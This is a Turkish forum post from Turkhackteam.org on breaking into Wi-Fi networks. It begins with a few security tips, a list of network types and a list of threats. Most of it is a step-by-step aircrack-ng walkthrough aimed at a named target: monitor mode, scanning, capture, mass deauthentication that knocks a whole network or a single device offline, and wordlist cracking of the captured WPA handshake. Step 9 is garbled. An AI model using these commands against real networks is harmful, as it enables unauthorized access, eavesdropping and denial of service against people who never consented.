Kablosuz Ağa Sızmak / Hacking Wireless Networks

17 Nis 2021
72
27
Kablosuz Ağ Sızması
Saldırgan taraflar, güvenliği sağlanamamış Kablosuz Ağlara sızma girişimlerinde bulunarak sizleri phishing sitelerine yönlendirebilir, kredi kartı bilgilerinizi kopyalayabilir, kişisel verilerinizi rahatça değiştirebilir ve alabilir. Kablosuz ağların en güvenliksiz olduğu yerler halka açık kafeler, salonlar, kıraathaneler, spor salonları vb. Saldırgan taraflar, bu yerlerdeki kablosuz ağlara sızıp birçok kişinin bilgisine rahatça erişebilir.

Kablosuz Ağ Güvenliği Sağlama Yöntemleri

1.Varsayılan kullanıcı adını değiştirmek.
2.Kaba Kuvvet saldırılarının önüne geçmek için benzersiz ve eşsiz şifre koymak.
3.Güçlü ağ şifreleme kullanmak (WPA, WPA2)
4.Kablosuz ağ yazılımınızı güncel tutmak.
5.FireWall (Güvenlik Duvarı) kullanmak.
6.WPS özelliğinizi kapatmak.

Ağ Türleri
*Wireless personal area network (WPAN)
*Wireless local area network (WLAN)
*Wireless metropolitian area network (WMAN)
*Wireless wide are network (WWAN)

Dağıtım Ağ Türleri
-Extension to a wired network
- Multiple to a wired network
- 3G/4G/5G hotspot

Wi-Fi Tehditleri
Erişim kontrol saldırısı: Yetkisiz bir ağa erişim elde eden saldırganlar.
Bütünlük ve gizlilik saldırıları: Saldırganlar, meşru kullanıcıların ağa erişmesini engeller.
Kimlik doğrulama saldırıları: Saldırgan, ağın meşru kullanıcılarını taklit etmeye çalışır.
Rogue Access: Saldırganlar, aynı konumdaki mevcut ve meşru bir SSID ile aynı SSID ile bir hileli erişim noktası başlatarak, ağa ve mevcut trafiğe erişim sağlamaya çalışır.

Hacking Wireless Network – Uygulama

Gerekenler;
- Harici Wi-Fi anteni
* Laptop Antenleri Monitör Moda sahip değildir.
- Airmon-ng
- Airodump-ng

1.Adım = ifconfig
- Adaptörümü bağladıktan sonra komut satırında root olarak “ifconfig” komutu çalıştırılır.
2.Adım = Wifi Kullanılıyorsa Kapatmak
- Komut satırına root olarak “airmon-ng check kill” komutu yazılır.
- Neden kapatıyorum? Çünkü monitör moda çekeceğim. Normal çalıştığı haliyle anteni kullanamam. Bundan dolayı ilk yapılan iş wireless’in kapatılmasıdır.
3.Adım = Anteni Monitör Moda Geçirmek
- Komut satırında root olarak “sudo ip link set wlan0 down” komutu çalışıtırılır, ardından;
- Komut satırında root olarak “sudo iw dev wlan0 set type monitor” komutu çalıştırılır.
- Komut satırında root olarak “sudo ip link set wlan0 up” komutu çalıştırılarak adaptör tekrar aktif hale gelir.
* ip ve iw komutları yoksa bunları yüklememiz gerekir.
4.Adım = İnjection Test Etmek
- Komut satırına “aireplay-ng -9 wlan0” yazılarak, etraftaki ağlara enjeksiyon yapabilir miyim diye yalnızca bunu test ediyorum.
5.Adım = wlan0 Monitör Modda Başlatmak
- Komut satırına root olarak “airmon-ng start wlan0” komutu çalıştırılır. (monitor modda mı diye kontrol edilir.)
- Burada adaptörümüz için “monitor mode already enabled” yazısını görürsek, adaptörümüzün monitor modda olduğunu anlarız.
6.Adım = Çevredeki Wifi’leri Tespit Etme
- Komut satırına root olarak “airodump-ng wlan0” komutu çalıştırılır.
7.Adım = Hedef AP-MAC Adresi Alınır
- Komut satırında root olarak “airodump-ng -c 2 –bssid X:X:X:X:X:X -w furkanSaldiri” komutu çalıştırılır.
8.Adım = Yeni Bağlantı Açıp, Hedefin Bağlantısını Düşürmek
- Komut satırında root olarak “aireplay-ng -0 50 -a 3C:46:D8:96:D3:7D wlan0” komutu çalıştırılır. Burada tüm ağ düşürülür.
- Sadece belirli bir kişinin cihazını düşürmek istersek “aireplay-ng --deauth 10000 -a [AĞ MAC] -c [CİHAZ MAC] wlan0” komutunu kullanabiliriz.
9.Adım = Decrypt Etme
- Komut satırında “WPA Handshake: X:X:X:X:X:X”
10.Adım = Decrypt İçin Aircrack Kullanmak
- “aircrack-ng -a2 -b 3C:46:D8:96:D3:7D -w /root/password.txt /root/handshake-01.cap”
- Komutta yer alan password.txt biz de oluşturabiliriz ya da hazır olarak internetten indirebiliriz.
- Kali’de var olanları şu şekilde listeleyebiliriz; “ls /usr/share/wordlist”
11.Adım = Monitor Modu Kapatıp Network’ü Normale Döndürmek
- “airmon-ng stop wlan0”
12.Adım = Network’u Çalıştırmak
- “systemctl start NetworkManager”

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.